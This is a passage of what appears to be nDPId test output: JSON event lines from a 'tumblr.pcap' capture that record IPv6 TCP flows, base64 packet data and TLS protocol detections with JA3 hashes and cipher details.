dvXiF8gTt9bh55AJVAbM2ak8Yu6DoJnJsa+jvwTKddiAxdtJhT3E7fBmbothroFA49N5AzGnFsh4cxhtIWJBj0s+8J1Phi\/75LUnCD0lYbxKIDoOKf0QWR08Jx8MCXKqwRPsjDU42Fi\/URG4BOwibUPBjlxMt8e\/Bx1zwNGX2TOl3lRdKcwrnMTh58G0mfgl41Ox0e5b1fEr4M"} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605292103811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103811,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W6tAAABAQgKM4zEp8LdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} +00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605292103882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103882,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dhQAAABAQgKOMLy3MLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605292103890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103890,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TwMAAABAQgKI0OB9cLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605292103902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103902,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W5SAAABAQgKM4zFAsLdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292104650,"flow_last_seen":1605292104650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292104650,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605292104650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104650,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoWdXXNVgBAB9YSyAAABAQgKTYTpp8Lc6wE="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605292104716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104716,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dc1X\/jEKGgBAMSBTRAAABAQgKwt2b\/U1+nj4="} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605292105170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":246,"pkt_l4_len":192,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHAMAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/HZTRuvUgBgSELhfAAABAQgKdG+lysLdLW8XAwMAm7+VUv5v3n1cEKhvA7Obmk7hW69laavu9OZNOdP5v2aiE9LYEKQeHffn7vm6VstuW5LB+GPd1bdCCYxPrQ8cpXXvSrRBde7Ubgvulsw\/eGF6vJKgoYXL5h04lY18ojPm\/cV9tUPretg64t\/hG52\/jXKkQ9+5e1GR1KuJgn1MWQ\/97vN82J\/Jt388ivkqQMfP0T\/jvMqs33Elwytq"} +00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605292105170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":237,"pkt_l4_len":183,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHALcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/RZTRuvUgBgSEKKhAAABAQgKdG+ly8LdLW8XAwMAazorJ+v8Qql\/1vWfAai2gkZCI3DTL5oADrcU2MSE9kWZdYS8Jqpk4fHfL5KS3jLCf57oTjL53SDsaGk+gIvtoan6S0MuUK39MyCSYP90lEM7cfvMMDv9MYZwBU7ADMu7jSPLRoIxvW6l0Cl8FwMDACLudklu9KmRe2M4B\/MpTRVuBpiUQvjz3VbQML7h4xLHHM4W"} +00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605292105171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":198,"pkt_l4_len":144,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAJAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxfpsKg54gBgd\/fuUAAABAQgKdG+ly8LdWR0XAwMAa1HIP\/vnAAogIw4J2B2TkEHONIFMeD5XyAVKi4Q2Vue2Mstte\/aj9aBEGnaC\/XLTSleNDPxB5FKFlYuKlZTTvSjcjRkZVdPHhikw9Xf3PTuX4sNc4A4aMrxDB+2xDdlSgUdvbOv4DPatYzp8"} +00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605292105171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxmpsKg54gBgd\/YTsAAABAQgKdG+lzMLdWR0XAwMAIlHp65gwK7PBPS\/ZXxVrtwWRv5u\/D1Oka\/7+0BiFD1N3mso="} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605292105176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1605292105176,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAI8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxpFsKg54gBgd\/f4EAAABAQgKdG+l0cLdWR0XAwMAau+1WhRe96DKEz4O2DiVS\/91xsnWseh+6lrx3LgaqNmDXwRm1lqF7AcLtXkaV8D99qMpoGwTJnk5i4\/A5jdKnihSC+92twzKrr9YRFj27xUmeqz0tGED25O9+HkuuOkV2W5IN6Z8o+lbpTM="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605292105195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105195,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATSgqAcsBIEmLB5kd7IUo3\/YpAbupnFNG69Q0av0WgBAMvoDtAAABAQgKwt2d3XRvpco="} +00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105197,"flow_last_seen":1605292105197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105197,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605292105197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105197,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OYAAAAAoAL9IHL6AAACBAWgBAIIClFT82IAAAAAAQMDBw=="} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105170,"flow_last_seen":1605292105221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12369,"flow_avg_l4_payload_len":386,"midstream":1,"thread_ts_msec":1605292105221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605292105230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105230,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDMLhfl2n7vTnoBJXgHalAAACBAV4AQMDAwQCCArC3Z3zUVPzYg=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1605292105230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105230,"pkt":"qtsDr8lk5EKm5WPyht1gCsuaACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5AwBu6fu9OfC4X5egBAB+\/qVAAABAQgKUVPzg8LdnfM="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105197,"flow_last_seen":1605292105231,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105171,"flow_last_seen":1605292105231,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":17162,"flow_avg_l4_payload_len":536,"midstream":1,"thread_ts_msec":1605292105231,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105274,"flow_last_seen":1605292105274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605292105274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105274,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZYAAAAAoAL9IG8jAAACBAWgBAIIClFT868AAAAAAQMDBw=="} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":369,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105197,"flow_last_seen":1605292105278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605292105278,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58380,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605292105299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105299,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNRVaI7oLKiX\/Ei0qAcsBIEmLB5kd7IUo3\/YpAbvkDobnvZrixr2XoBJXgG87AAACBAV4AQMDAwQCCArC3Z5DUVPzrw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1605292105299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105299,"pkt":"qtsDr8lk5EKm5WPyht1gA8c5ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATUVWiO6Cyol\/xIt5A4Bu+LGvZeG572bgBAB+\/MzAAABAQgKUVPzyMLdnkM="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105418,"flow_last_seen":1605292105418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105418,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605292105418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105418,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3sAAAAAoAL9IOHqAAACBAWgBAIIChNm5EYAAAAAAQMDBw=="} +00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105433,"flow_last_seen":1605292105433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105433,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605292105433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105433,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACgGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5MAAAAAoAL9IMKvAAACBAWgBAIICr4D0hAAAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605292105447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105447,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY8Go+Ou0O5ht8oBJXgIDEAAACBAV4AQMDAwQCCArC3Z7YE2bkRg=="} 